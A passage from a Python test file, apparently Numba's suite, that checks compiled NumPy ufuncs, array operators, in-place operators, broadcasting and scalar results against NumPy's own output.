self.basic_ufunc_test(np.less_equal, flags=flags)
def test_not_equal_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.not_equal, flags=flags)
def test_equal_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.equal, flags=flags)
def test_logical_and_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.logical_and, flags=flags)
def test_logical_or_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.logical_or, flags=flags)
def test_logical_xor_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.logical_xor, flags=flags)
def test_logical_not_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.logical_not, flags=flags)
def test_maximum_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.maximum, flags=flags)
def test_minimum_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.minimum, flags=flags)
def test_fmax_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.fmax, flags=flags)
def test_fmin_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.fmin, flags=flags)
############################################################################
# Floating functions
def bool_additional_inputs(self):
return [
(np.array([True, False], dtype=np.bool_),
types.Array(types.bool_, 1, 'C')),
]
def test_isfinite_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(
np.isfinite, flags=flags, kinds='ifcb',
additional_inputs=self.bool_additional_inputs(),
)
def test_isinf_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(
np.isinf, flags=flags, kinds='ifcb',
additional_inputs=self.bool_additional_inputs(),
)
def test_isnan_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(
np.isnan, flags=flags, kinds='ifcb',
additional_inputs=self.bool_additional_inputs(),
)
def test_signbit_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.signbit, flags=flags)
def test_copysign_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.copysign, flags=flags, kinds='f')
def test_nextafter_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.nextafter, flags=flags, kinds='f')
@_unimplemented
def test_modf_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.modf, flags=flags, kinds='f')
# Note: there is no entry for ldexp as this harness isn't valid for this
# ufunc. this is so because ldexp requires heterogeneous inputs.
# However, this ufunc is tested by the TestLoopTypes test classes.
@_unimplemented
def test_frexp_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.frexp, flags=flags, kinds='f')
def test_floor_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.floor, flags=flags, kinds='f')
def test_ceil_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.ceil, flags=flags, kinds='f')
def test_trunc_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.trunc, flags=flags, kinds='f')
def test_spacing_ufunc(self, flags=no_pyobj_flags):
self.basic_ufunc_test(np.spacing, flags=flags, kinds='f')
############################################################################
# Other tests
def binary_ufunc_mixed_types_test(self, ufunc, flags=no_pyobj_flags):
ufunc_name = ufunc.__name__
ufunc = _make_ufunc_usecase(ufunc)
inputs1 = [
(1, types.uint64),
(-1, types.int64),
(0.5, types.float64),
(np.array([0, 1], dtype='u8'), types.Array(types.uint64, 1, 'C')),
(np.array([-1, 1], dtype='i8'), types.Array(types.int64, 1, 'C')),
(np.array([-0.5, 0.5], dtype='f8'), types.Array(types.float64, 1, 'C'))]
inputs2 = inputs1
output_types = [types.Array(types.int64, 1, 'C'),
types.Array(types.float64, 1, 'C')]
pyfunc = ufunc
for input1, input2, output_type in itertools.product(inputs1, inputs2, output_types):
input1_operand = input1[0]
input1_type = input1[1]
input2_operand = input2[0]
input2_type = input2[1]
# Skip division by unsigned int because of NumPy bugs
if ufunc_name == 'divide' and (input2_type == types.Array(types.uint32, 1, 'C') or
input2_type == types.Array(types.uint64, 1, 'C')):
continue
# Skip some subtraction tests because of NumPy bugs
if ufunc_name == 'subtract' and input1_type == types.Array(types.uint32, 1, 'C') and \
input2_type == types.uint32 and types.Array(types.int64, 1, 'C'):
continue
if ufunc_name == 'subtract' and input1_type == types.Array(types.uint32, 1, 'C') and \
input2_type == types.uint64 and types.Array(types.int64, 1, 'C'):
continue
if ((isinstance(input1_type, types.Array) or
isinstance(input2_type, types.Array)) and
not isinstance(output_type, types.Array)):
continue
cr = self.cache.compile(pyfunc,
(input1_type, input2_type, output_type),
flags=flags)
cfunc = cr.entry_point
if isinstance(input1_operand, np.ndarray):
result = np.zeros(input1_operand.size,
dtype=output_type.dtype.name)
expected = np.zeros(input1_operand.size,
dtype=output_type.dtype.name)
elif isinstance(input2_operand, np.ndarray):
result = np.zeros(input2_operand.size,
dtype=output_type.dtype.name)
expected = np.zeros(input2_operand.size,
dtype=output_type.dtype.name)
else:
result = np.zeros(1, dtype=output_type.dtype.name)
expected = np.zeros(1, dtype=output_type.dtype.name)
cfunc(input1_operand, input2_operand, result)
pyfunc(input1_operand, input2_operand, expected)
scalar_type = getattr(output_type, 'dtype', output_type)
prec = ('single'
if scalar_type in (types.float32, types.complex64)
else 'double')
self.assertPreciseEqual(expected, result, prec=prec)
def test_broadcasting(self):
# Test unary ufunc
pyfunc = _make_ufunc_usecase(np.negative)
input_operands = [
np.arange(3, dtype='i8'),
np.arange(3, dtype='i8').reshape(3,1),
np.arange(3, dtype='i8').reshape(1,3),
np.arange(3, dtype='i8').reshape(3,1),
np.arange(3, dtype='i8').reshape(1,3),
np.arange(3*3, dtype='i8').reshape(3,3)]
output_operands = [
np.zeros(3*3, dtype='i8').reshape(3,3),
np.zeros(3*3, dtype='i8').reshape(3,3),
np.zeros(3*3, dtype='i8').reshape(3,3),
np.zeros(3*3*3, dtype='i8').reshape(3,3,3),
np.zeros(3*3*3, dtype='i8').reshape(3,3,3),
np.zeros(3*3*3, dtype='i8').reshape(3,3,3)]
for x, result in zip(input_operands, output_operands):
input_type = types.Array(types.uint64, x.ndim, 'C')
output_type = types.Array(types.int64, result.ndim, 'C')
cr = self.cache.compile(pyfunc, (input_type, output_type),
flags=no_pyobj_flags)
cfunc = cr.entry_point
expected = np.zeros(result.shape, dtype=result.dtype)
np.negative(x, expected)
cfunc(x, result)
self.assertPreciseEqual(result, expected)
# Test binary ufunc
pyfunc = _make_ufunc_usecase(np.add)
input1_operands = [
np.arange(3, dtype='u8'),
np.arange(3*3, dtype='u8').reshape(3,3),
np.arange(3*3*3, dtype='u8').reshape(3,3,3),
np.arange(3, dtype='u8').reshape(3,1),
np.arange(3, dtype='u8').reshape(1,3),
np.arange(3, dtype='u8').reshape(3,1,1),
np.arange(3*3, dtype='u8').reshape(3,3,1),
np.arange(3*3, dtype='u8').reshape(3,1,3),
np.arange(3*3, dtype='u8').reshape(1,3,3)]
input2_operands = input1_operands
for x, y in itertools.product(input1_operands, input2_operands):
input1_type = types.Array(types.uint64, x.ndim, 'C')
input2_type = types.Array(types.uint64, y.ndim, 'C')
output_type = types.Array(types.uint64, max(x.ndim, y.ndim), 'C')
cr = self.cache.compile(pyfunc, (input1_type, input2_type, output_type),
flags=no_pyobj_flags)
cfunc = cr.entry_point
expected = np.add(x, y)
result = np.zeros(expected.shape, dtype='u8')
cfunc(x, y, result)
self.assertPreciseEqual(result, expected)
def test_implicit_output_npm(self):
with self.assertRaises(TypeError):
def myadd(a0, a1):
return np.add(a0, a1)
arr_ty = types.Array(types.uint64, 1, 'C')
cr = compile_isolated(myadd, (arr_ty, arr_ty),
flags=no_pyobj_flags)
def test_broadcast_implicit_output_npm_nrt(self):
def pyfunc(a0, a1):
return np.add(a0, a1)
input1_operands = [
np.arange(3, dtype='u8'),
np.arange(3*3, dtype='u8').reshape(3,3),
np.arange(3*3*3, dtype='u8').reshape(3,3,3),
np.arange(3, dtype='u8').reshape(3,1),
np.arange(3, dtype='u8').reshape(1,3),
np.arange(3, dtype='u8').reshape(3,1,1),
np.arange(3*3, dtype='u8').reshape(3,3,1),
np.arange(3*3, dtype='u8').reshape(3,1,3),
np.arange(3*3, dtype='u8').reshape(1,3,3)]
input2_operands = input1_operands
for x, y in itertools.product(input1_operands, input2_operands):
input1_type = types.Array(types.uint64, x.ndim, 'C')
input2_type = types.Array(types.uint64, y.ndim, 'C')
cr = self.cache.compile(pyfunc, (input1_type, input2_type),
flags=enable_nrt_flags)
cfunc = cr.entry_point
expected = np.add(x, y)
result = cfunc(x, y)
np.testing.assert_array_equal(expected, result)
def test_implicit_output_layout_binary(self):
def pyfunc(a0, a1):
return np.add(a0, a1)
# C layout
X = np.linspace(0, 1, 20).reshape(4, 5)
# F layout
Y = np.array(X, order='F')
# A layout
Z = X.reshape(5, 4).T[0]
Xty = typeof(X)
assert X.flags.c_contiguous and Xty.layout == 'C'
Yty = typeof(Y)
assert Y.flags.f_contiguous and Yty.layout == 'F'
Zty = typeof(Z)
assert Zty.layout == 'A'
assert not Z.flags.c_contiguous
assert not Z.flags.f_contiguous
testcases = list(itertools.permutations([X, Y, Z], 2))
testcases += [(X, X)]
testcases += [(Y, Y)]
testcases += [(Z, Z)]
for arg0, arg1 in testcases:
cr = self.cache.compile(pyfunc, (typeof(arg0), typeof(arg1)),
flags=enable_nrt_flags)
expected = pyfunc(arg0, arg1)
result = cr.entry_point(arg0, arg1)
self.assertEqual(expected.flags.c_contiguous,
result.flags.c_contiguous)
self.assertEqual(expected.flags.f_contiguous,
result.flags.f_contiguous)
np.testing.assert_array_equal(expected, result)
def test_implicit_output_layout_unary(self):
def pyfunc(a0):
return np.sqrt(a0)
# C layout
X = np.linspace(0, 1, 20).reshape(4, 5)
# F layout
Y = np.array(X, order='F')
# A layout
Z = X.reshape(5, 4).T[0]
Xty = typeof(X)
assert X.flags.c_contiguous and Xty.layout == 'C'
Yty = typeof(Y)
assert Y.flags.f_contiguous and Yty.layout == 'F'
Zty = typeof(Z)
assert Zty.layout == 'A'
assert not Z.flags.c_contiguous
assert not Z.flags.f_contiguous
for arg0 in [X, Y, Z]:
cr = self.cache.compile(pyfunc, (typeof(arg0),),
flags=enable_nrt_flags)
expected = pyfunc(arg0)
result = cr.entry_point(arg0)
self.assertEqual(expected.flags.c_contiguous,
result.flags.c_contiguous)
self.assertEqual(expected.flags.f_contiguous,
result.flags.f_contiguous)
np.testing.assert_array_equal(expected, result)
class TestArrayOperators(BaseUFuncTest, TestCase):
def _check_results(self, expected, got):
self.assertEqual(expected.dtype.kind, got.dtype.kind)
np.testing.assert_array_almost_equal(expected, got)
def unary_op_test(self, operator, flags=enable_nrt_flags,
skip_inputs=[], additional_inputs=[],
int_output_type=None, float_output_type=None):
operator_func = _make_unary_ufunc_op_usecase(operator)
inputs = list(self.inputs)
inputs.extend(additional_inputs)
pyfunc = operator_func
for input_tuple in inputs:
input_operand, input_type = input_tuple
if ((input_type in skip_inputs) or
(not isinstance(input_type, types.Array))):
continue
cr = self.cache.compile(pyfunc, (input_type,),
flags=flags)
cfunc = cr.entry_point
expected = pyfunc(input_operand)
got = cfunc(input_operand)
self._check_results(expected, got)
def binary_op_test(self, operator, flags=enable_nrt_flags,
skip_inputs=[], additional_inputs=[],
int_output_type=None, float_output_type=None,
positive_rhs=False):
operator_func = _make_binary_ufunc_op_usecase(operator)
inputs = list(self.inputs)
inputs.extend(additional_inputs)
pyfunc = operator_func
# when generating arbitrary sequences, we use a fixed seed
# for deterministic testing
random_state = np.random.RandomState(1)
for input_tuple in inputs:
input_operand1, input_type = input_tuple
input_dtype = numpy_support.as_dtype(
getattr(input_type, "dtype", input_type))
input_type1 = input_type
if input_type in skip_inputs:
continue
if positive_rhs:
zero = np.zeros(1, dtype=input_dtype)[0]
# If we only use two scalars, the code generator will not
# select the ufunctionalized operator, so we mix it up.
if isinstance(input_type, types.Array):
input_operand0 = input_operand1
input_type0 = input_type
if positive_rhs and np.any(input_operand1 < zero):
continue
else:
input_operand0 = (random_state.uniform(0, 100, 10)).astype(
input_dtype)
input_type0 = typeof(input_operand0)
if positive_rhs and input_operand1 < zero:
continue
cr = self.cache.compile(pyfunc, (input_type0, input_type1),
flags=flags)
cfunc = cr.entry_point
expected = pyfunc(input_operand0, input_operand1)
got = cfunc(input_operand0, input_operand1)
self._check_results(expected, got)
def bitwise_additional_inputs(self):
# For bitwise operators, we want to check the results for boolean
# arrays (see #1813).
return [
(True, types.boolean),
(False, types.boolean),
(np.array([True, False]), types.Array(types.boolean, 1, 'C')),
]
def binary_int_op_test(self, *args, **kws):
skip_inputs = kws.setdefault('skip_inputs', [])
skip_inputs += [
types.float32, types.float64,
types.Array(types.float32, 1, 'C'),
types.Array(types.float64, 1, 'C'),
]
return self.binary_op_test(*args, **kws)
def binary_bitwise_op_test(self, *args, **kws):
additional_inputs = kws.setdefault('additional_inputs', [])
additional_inputs += self.bitwise_additional_inputs()
return self.binary_int_op_test(*args, **kws)
def inplace_op_test(self, operator, lhs_values, rhs_values,
lhs_dtypes, rhs_dtypes):
operator_func = _make_inplace_ufunc_op_usecase(operator)
pyfunc = operator_func
# The left operand can only be an array, while the right operand
# can be either an array or a scalar
lhs_inputs = [np.array(lhs_values, dtype=dtype)
for dtype in lhs_dtypes]
rhs_arrays = [np.array(rhs_values, dtype=dtype)
for dtype in rhs_dtypes]
rhs_scalars = [dtype(v) for v in rhs_values for dtype in rhs_dtypes]
rhs_inputs = rhs_arrays + rhs_scalars
for lhs, rhs in itertools.product(lhs_inputs, rhs_inputs):
lhs_type = typeof(lhs)
rhs_type = typeof(rhs)
cr = self.cache.compile(pyfunc, (lhs_type, rhs_type),
flags=no_pyobj_flags)
cfunc = cr.entry_point
expected = lhs.copy()
pyfunc(expected, rhs)
got = lhs.copy()
cfunc(got, rhs)
self.assertPreciseEqual(got, expected)
def inplace_float_op_test(self, operator, lhs_values, rhs_values):
# Also accept integer inputs for the right operand (they should
# be converted to float).
return self.inplace_op_test(operator, lhs_values, rhs_values,
(np.float32, np.float64),
(np.float32, np.float64, np.int64))
def inplace_int_op_test(self, operator, lhs_values, rhs_values):
self.inplace_op_test(operator, lhs_values, rhs_values,
(np.int16, np.int32, np.int64),
(np.int16, np.uint32))
def inplace_bitwise_op_test(self, operator, lhs_values, rhs_values):
self.inplace_int_op_test(operator, lhs_values, rhs_values)
self.inplace_op_test(operator, lhs_values, rhs_values,
(np.bool_,), (np.bool_, np.bool_))
# ____________________________________________________________
# Unary operators
def test_unary_positive_array_op(self):
self.unary_op_test('+')
def test_unary_negative_array_op(self):
self.unary_op_test('-')
def test_unary_invert_array_op(self):
self.unary_op_test('~',
skip_inputs=[types.float32, types.float64,
types.Array(types.float32, 1, 'C'),
types.Array(types.float64, 1, 'C')],
additional_inputs=self.bitwise_additional_inputs())
# ____________________________________________________________
# Inplace operators
def test_inplace_add(self):
self.inplace_float_op_test('+=', [-1, 1.5, 3], [-5, 0, 2.5])
self.inplace_float_op_test(operator.iadd, [-1, 1.5, 3], [-5, 0, 2.5])
def test_inplace_sub(self):
self.inplace_float_op_test('-=', [-1, 1.5, 3], [-5, 0, 2.5])
self.inplace_float_op_test(operator.isub, [-1, 1.5, 3], [-5, 0, 2.5])
def test_inplace_mul(self):
self.inplace_float_op_test('*=', [-1, 1.5, 3], [-5, 0, 2.5])
self.inplace_float_op_test(operator.imul, [-1, 1.5, 3], [-5, 0, 2.5])
def test_inplace_floordiv(self):
self.inplace_float_op_test('//=', [-1, 1.5, 3], [-5, 1.25, 2.5])
self.inplace_float_op_test(operator.ifloordiv, [-1, 1.5, 3], [-5, 1.25, 2.5])
def test_inplace_div(self):
self.inplace_float_op_test('/=', [-1, 1.5, 3], [-5, 0, 2.5])
self.inplace_float_op_test(operator.itruediv, [-1, 1.5, 3], [-5, 1.25, 2.5])
def test_inplace_remainder(self):
self.inplace_float_op_test('%=', [-1, 1.5, 3], [-5, 2, 2.5])
self.inplace_float_op_test(operator.imod, [-1, 1.5, 3], [-5, 2, 2.5])
def test_inplace_pow(self):
self.inplace_float_op_test('**=', [-1, 1.5, 3], [-5, 2, 2.5])
self.inplace_float_op_test(operator.ipow, [-1, 1.5, 3], [-5, 2, 2.5])
def test_inplace_and(self):
self.inplace_bitwise_op_test('&=', [0, 1, 2, 3, 51], [0, 13, 16, 42, 255])
self.inplace_bitwise_op_test(operator.iand, [0, 1, 2, 3, 51], [0, 13, 16, 42, 255])
def test_inplace_or(self):
self.inplace_bitwise_op_test('|=', [0, 1, 2, 3, 51], [0, 13, 16, 42, 255])
self.inplace_bitwise_op_test(operator.ior, [0, 1, 2, 3, 51], [0, 13, 16, 42, 255])
def test_inplace_xor(self):
self.inplace_bitwise_op_test('^=', [0, 1, 2, 3, 51], [0, 13, 16, 42, 255])
self.inplace_bitwise_op_test(operator.ixor, [0, 1, 2, 3, 51], [0, 13, 16, 42, 255])
def test_inplace_lshift(self):
self.inplace_int_op_test('<<=', [0, 5, -10, -51], [0, 1, 4, 14])
self.inplace_int_op_test(operator.ilshift, [0, 5, -10, -51], [0, 1, 4, 14])
def test_inplace_rshift(self):
self.inplace_int_op_test('>>=', [0, 5, -10, -51], [0, 1, 4, 14])
self.inplace_int_op_test(operator.irshift, [0, 5, -10, -51], [0, 1, 4, 14])
def test_unary_positive_array_op(self):
'''
Verify that the unary positive operator copies values, and doesn't
just alias to the input array (mirrors normal Numpy/Python
interaction behavior).
'''
# Test originally from @gmarkall
def f(a1):
a2 = +a1
a1[0] = 3
a2[1] = 4
return a2
a1 = np.zeros(10)
a2 = f(a1)
self.assertTrue(a1[0] != a2[0] and a1[1] != a2[1])
a3 = np.zeros(10)
a4 = njit(f)(a3)
self.assertTrue(a3[0] != a4[0] and a3[1] != a4[1])
np.testing.assert_array_equal(a1, a3)
np.testing.assert_array_equal(a2, a4)
# ____________________________________________________________
# Binary operators
def test_add_array_op(self):
self.binary_op_test('+')
def test_subtract_array_op(self):
self.binary_op_test('-')
def test_multiply_array_op(self):
self.binary_op_test('*')
def test_divide_array_op(self):
int_out_type = None
int_out_type = types.float64
self.binary_op_test('/', int_output_type=int_out_type)
def test_floor_divide_array_op(self):
# Avoid floating-point zeros as x // 0.0 can have varying results
# depending on the algorithm (which changed across Numpy versions)
self.inputs = [
(np.uint32(1), types.uint32),
(np.int32(-2), types.int32),
(np.int32(0), types.int32),
(np.uint64(4), types.uint64),
(np.int64(-5), types.int64),
(np.int64(0), types.int64),
(np.float32(-0.5), types.float32),
(np.float32(1.5), types.float32),
(np.float64(-2.5), types.float64),
(np.float64(3.5), types.float64),
(np.array([1,2], dtype='u4'), types.Array(types.uint32, 1, 'C')),
(np.array([3,4], dtype='u8'), types.Array(types.uint64, 1, 'C')),
(np.array([-1,1,5], dtype='i4'), types.Array(types.int32, 1, 'C')),
(np.array([-1,1,6], dtype='i8'), types.Array(types.int64, 1, 'C')),
(np.array([-0.5, 1.5], dtype='f4'), types.Array(types.float32, 1, 'C')),
(np.array([-2.5, 3.5], dtype='f8'), types.Array(types.float64, 1, 'C')),
]
self.binary_op_test('//')
def test_remainder_array_op(self):
self.binary_op_test('%')
def test_power_array_op(self):
self.binary_op_test('**', positive_rhs=True)
def test_left_shift_array_op(self):
self.binary_int_op_test('<<', positive_rhs=True)
def test_right_shift_array_op(self):
self.binary_int_op_test('>>', positive_rhs=True)
def test_bitwise_and_array_op(self):
self.binary_bitwise_op_test('&')
def test_bitwise_or_array_op(self):
self.binary_bitwise_op_test('|')
def test_bitwise_xor_array_op(self):
self.binary_bitwise_op_test('^')
def test_equal_array_op(self):
self.binary_op_test('==')
def test_greater_array_op(self):
self.binary_op_test('>')
def test_greater_equal_array_op(self):
self.binary_op_test('>=')
def test_less_array_op(self):
self.binary_op_test('<')
def test_less_equal_array_op(self):
self.binary_op_test('<=')
def test_not_equal_array_op(self):
self.binary_op_test('!=')
class TestScalarUFuncs(TestCase):
"""check the machinery of ufuncs works when the result is an scalar.
These are not exhaustive because:
- the machinery to support this case is the same for all the functions of a
given arity.
- the result of the inner function itself is already tested in TestUFuncs
This class tests regular uses. A subclass tests the no python backend.
"""
_compile_flags = enable_pyobj_flags
def run_ufunc(self, pyfunc, arg_types, arg_values):
for tyargs, args in zip(arg_types, arg_values):
cr = compile_isolated(pyfunc, tyargs, flags=self._compile_flags)
cfunc = cr.entry_point
got = cfunc(*args)
expected = pyfunc(*_as_dtype_value(tyargs, args))
msg = 'for args {0} typed {1}'.format(args, tyargs)
# note: due to semantics of ufuncs, thing like adding a int32 to a
# uint64 results in doubles (as neither int32 can be cast safely
# to uint64 nor vice-versa, falling back to using the float version.
# Modify in those cases the expected value (the numpy version does
# not use typed integers as inputs so its result is an integer)
special = set([(types.int32, types.uint64), (types.uint64, types.int32),
(types.int64, types.uint64), (types.uint64, types.int64)])
if tyargs in special:
expected = float(expected)
else:
# The numba version of scalar ufuncs return an actual value that
# gets converted to a Python type, instead of using NumPy scalars.
# although in python 2 NumPy scalars are considered and instance of
# the appropriate python type, in python 3 that is no longer the case.
# This is why the expected result is casted to the appropriate Python
# type (which is actually the expected behavior of the ufunc translation)
if np.issubdtype(expected.dtype, np.inexact):
expected = float(expected)
elif np.issubdtype(expected.dtype, np.integer):
expected = int(expected)
elif np.issubdtype(expected.dtype, np.bool_):
expected = bool(expected)
alltypes = cr.signature.args + (cr.signature.return_type,)
# select the appropriate precision for comparison: note that an argument
# typed at a lower precision can introduce precision problems. For this
# reason the argument types must be taken into account.
if any([t==types.float32 for t in alltypes]):
prec='single'
elif any([t==types.float64 for t in alltypes]):
prec='double'
else:
prec='exact'
self.assertPreciseEqual(got, expected, msg=msg, prec=prec)
def test_scalar_unary_ufunc(self):
def _func(x):
return np.sqrt(x)
vals = [(2,), (2,), (1,), (2,), (.1,), (.2,)]
tys = [(types.int32,), (types.uint32,),
(types.int64,), (types.uint64,),
(types.float32,), (types.float64,)]
self.run_ufunc(_func, tys, vals)
def test_scalar_binary_uniform_ufunc(self):
def _func(x,y):
return np.add(x,y)
vals = [2, 2, 1, 2, .1, .2]
tys = [types.int32, types.uint32,
types.int64, types.uint64, types.float32, types.float64]
self.run_ufunc(_func, zip(tys, tys), zip(vals, vals))
def test_scalar_binary_mixed_ufunc(self, flags=enable_pyobj_flags):
def _func(x,y):
return np.add(x,y)
vals = [2, 2, 1, 2, .1, .2]
tys = [types.int32, types.uint32,
types.int64, types.uint64,
types.float32, types.float64]
self.run_ufunc(_func, itertools.product(tys, tys),
itertools.product(vals, vals))
class TestScalarUFuncsNoPython(TestScalarUFuncs):
"""Same tests as TestScalarUFuncs, but forcing no python mode"""
_compile_flags = no_pyobj_flags
class TestUfuncIssues(TestCase):
def test_issue_651(self):
# Exercise the code path to make sure this does not fail
@vectorize(["(float64,float64)"])
def foo(x1, x2):
return np.add(x1, x2) + np.add(x1, x2)
a = np.arange(10, dtype='f8')
b = np.arange(10, dtype='f8')
self.assertPreciseEqual(foo(a, b), (a + b) + (a + b))
def test_issue_713(self):
def foo(x,y):
return np.floor_divide(x,y)
cr = compile_isolated(foo, [types.complex128, types.complex128])
self.assertEqual(foo(1j, 1j), cr.entry_point(1j, 1j))
def test_issue_2006(self):
"""
<float32 ** int> should return float32, not float64.
"""
def foo(x, y):
return np.power(x, y)
pyfunc = foo
cfunc = jit(nopython=True)(pyfunc)
def check(x, y):
got = cfunc(x, y)
np.testing.assert_array_almost_equal(got, pyfunc(x, y))
# Check the power operation conserved the input's dtype
# (this is different from Numpy, whose behaviour depends on
# the *values* of the arguments -- see PyArray_CanCastArrayTo).
self.assertEqual(got.dtype, x.dtype)
xs = [np.float32([1, 2, 3]), np.complex64([1j, 2, 3-3j])]
for x in xs:
check(x, 3)
check(x, np.uint64(3))
check(x, np.int64([2, 2, 3]))
class _LoopTypesTester(TestCase):
"""Test code generation for the different loop types defined by ufunc.
This test relies on class variables to configure the test. Subclasses
of this class can just override some of these variables to check other
ufuncs in a different compilation context. The variables supported are:
_funcs: the ufuncs to test
_compile_flags: compilation flags to use (to force nopython mode)
_skip_types: letter types that force skipping the loop when testing
if present in the NumPy ufunc signature.
_supported_types: only test loops where all the types in the loop
signature are in this collection. If unset, all.
Note that both, _skip_types and _supported_types must be met for a loop
to be tested.
The NumPy ufunc signature has a form like 'ff->f' (for a binary ufunc
loop taking 2 floats and resulting in a float). In a NumPy ufunc object
you can get a list of supported signatures by accessing the attribute
'types'.
"""
_skip_types = 'OegG'
# Allowed deviation between Numpy and Numba results
_ulps = {('arccos', 'F'): 2,
('arcsin', 'D'): 4,
('arcsin', 'F'): 4,
('log10', 'D'): 5,
('tanh', 'F'): 2,
}
def _arg_for_type(self, a_letter_type, index=0):
"""return a suitable array argument for testing the letter type"""
# Note all possible arrays must have the same size, since they
# may be used as inputs to the same func.
if a_letter_type in 'bhilq':
# an integral
return np.array([1, 4, 0, -2], dtype=a_letter_type)
if a_letter_type in 'BHILQ':
return np.array([1, 2, 4, 0], dtype=a_letter_type)
elif a_letter_type in '?':
# a boolean
return np.array([True, False, False, True], dtype=a_letter_type)
elif a_letter_type[0] == 'm':
# timedelta64
if len(a_letter_type) == 1:
a_letter_type = 'm8[D]'
return np.array([2, -3, 'NaT', 0], dtype=a_letter_type)
elif a_letter_type[0] == 'M':
# datetime64
if len(a_letter_type) == 1:
a_letter_type = 'M8[D]'
return np.array(['Nat', 1, 25, 0], dtype=a_letter_type)
elif a_letter_type in 'fd':
# floating point
return np.array([1.5, -3.5, 0.0, float('nan')],
dtype=a_letter_type)
elif a_letter_type in 'FD':
# complex
# Note `-1j` is different on 2.x and 3.x, hence the explicit spelling
if sys.platform != 'win32':
# Other platforms have better handling of negative zeros,
# test them
negzero = -(0.0 + 1.0j)
else:
negzero = 0.0 - 1.0j
return np.array([negzero, 1.5 + 1.5j, 1j * float('nan'), 0j],
dtype=a_letter_type)
else:
raise RuntimeError("type %r not understood" % (a_letter_type,))
def _check_loop(self, fn, ufunc, loop):
# the letter types for the args
letter_types = loop[:ufunc.nin] + loop[-ufunc.nout:]
# ignore the loops containing an object argument. They will always
# fail in no python mode. Usually the last loop in ufuncs is an all
# object fallback
supported_types = getattr(self, '_supported_types', [])
if (supported_types and
any(l not in supported_types for l in letter_types)):
return
skip_types = getattr(self, '_skip_types', [])
if any(l in skip_types for l in letter_types):
return
# if the test case requires some types to be present, skip loops
# not involving any of those types.
required_types = getattr(self, '_required_types', [])
if required_types and not any(l in letter_types
for l in required_types):
return
self._check_ufunc_with_dtypes(fn, ufunc, letter_types)
def _check_ufunc_with_dtypes(self, fn, ufunc, dtypes):
arg_dty = [np.dtype(t) for t in dtypes]
arg_nbty = [types.Array(from_dtype(t), 1, 'C') for t in arg_dty]
cr = compile_isolated(fn, arg_nbty, flags=self._compile_flags)
# Ensure a good mix of input values
c_args = [self._arg_for_type(t, index=index).repeat(2)
for index, t in enumerate(dtypes)]
for arr in c_args:
self.random.shuffle(arr)
py_args = [a.copy() for a in c_args]
cr.entry_point(*c_args)
fn(*py_args)
# Check each array (including inputs, to ensure they weren't
# mutated).
for dtype, py_arg, c_arg in zip(arg_dty, py_args, c_args):
py_arg, c_arg = self._fixup_results(dtype, py_arg, c_arg)
typechar = c_arg.dtype.char
ulps = self._ulps.get((ufunc.__name__, typechar), 1)
prec = 'single' if typechar in 'fF' else 'exact'
prec = 'double' if typechar in 'dD' else prec
msg = '\n'.join(["ufunc '{0}' arrays differ ({1}):",
"args: {2}", "expected {3}", "got {4}"])
msg = msg.format(ufunc.__name__, c_args, prec, py_arg, c_arg)
self.assertPreciseEqual(py_arg, c_arg, prec=prec, msg=msg,
ulps=ulps)
def _fixup_results(self, dtype, py_arg, c_arg):
return py_arg, c_arg
@classmethod
def _check_ufunc_loops(cls, ufunc):
for loop in ufunc.types:
cls._inject_test(ufunc, loop)
@classmethod
def _inject_test(cls, ufunc, loop):
def test_template(self):
fn = _make_ufunc_usecase(ufunc)
self._check_loop(fn, ufunc, loop)
setattr(cls, "test_{0}_{1}".format(ufunc.__name__,
loop.replace('->', '_')),
test_template)
@classmethod
def autogenerate(cls):
for ufunc in cls._ufuncs:
cls._check_ufunc_loops(ufunc)
class TestLoopTypesIntNoPython(_LoopTypesTester):
_compile_flags = no_pyobj_flags
_ufuncs = supported_ufuncs[:]
# reciprocal and power need a special test due to issue #757
_ufuncs.remove(np.power)
_ufuncs.remove(np.reciprocal)
_ufuncs.remove(np.left_shift) # has its own test class
_ufuncs.remove(np.right_shift) # has its own test class
# special test for bool subtract/negative
_ufuncs.remove(np.subtract)
_ufuncs.remove(np.negative)
_required_types = '?bBhHiIlLqQ'
_skip_types = 'fdFDmMO' + _LoopTypesTester._skip_types
TestLoopTypesIntNoPython.autogenerate()
class TestLoopTypesSubtractAndNegativeNoPython(_LoopTypesTester):
_compile_flags = no_pyobj_flags
_ufuncs = [np.subtract, np.negative]
_required_types = '?bBhHiIlLqQfdFD'
_skip_types = 'mMO' + _LoopTypesTester._skip_types + '?'
TestLoopTypesSubtractAndNegativeNoPython.autogenerate()
class TestLoopTypesReciprocalNoPython(_LoopTypesTester):
_compile_flags = no_pyobj_flags
_ufuncs = [np.reciprocal] # issue #757
_required_types = 'bBhHiIlLqQfdFD'
_skip_types = 'mMO' + _LoopTypesTester._skip_types
def _arg_for_type(self, a_letter_type, index=0):
res = super(self.__class__, self)._arg_for_type(a_letter_type,
index=index)
if a_letter_type in 'bBhHiIlLqQ':
# For integer reciprocal, avoid 0 as argument, as it triggers
# undefined behavior that may differ in results from Numba
# to the compiler used to compile NumPy.
res[res == 0] = 42
return res
TestLoopTypesReciprocalNoPython.autogenerate()
class TestLoopTypesPowerNoPython(_LoopTypesTester):
_compile_flags = no_pyobj_flags
_ufuncs = [np.power] # issue #757
_required_types = 'bBhHiIlLqQfdFD'
_skip_types = 'mMO' + _LoopTypesTester._skip_types
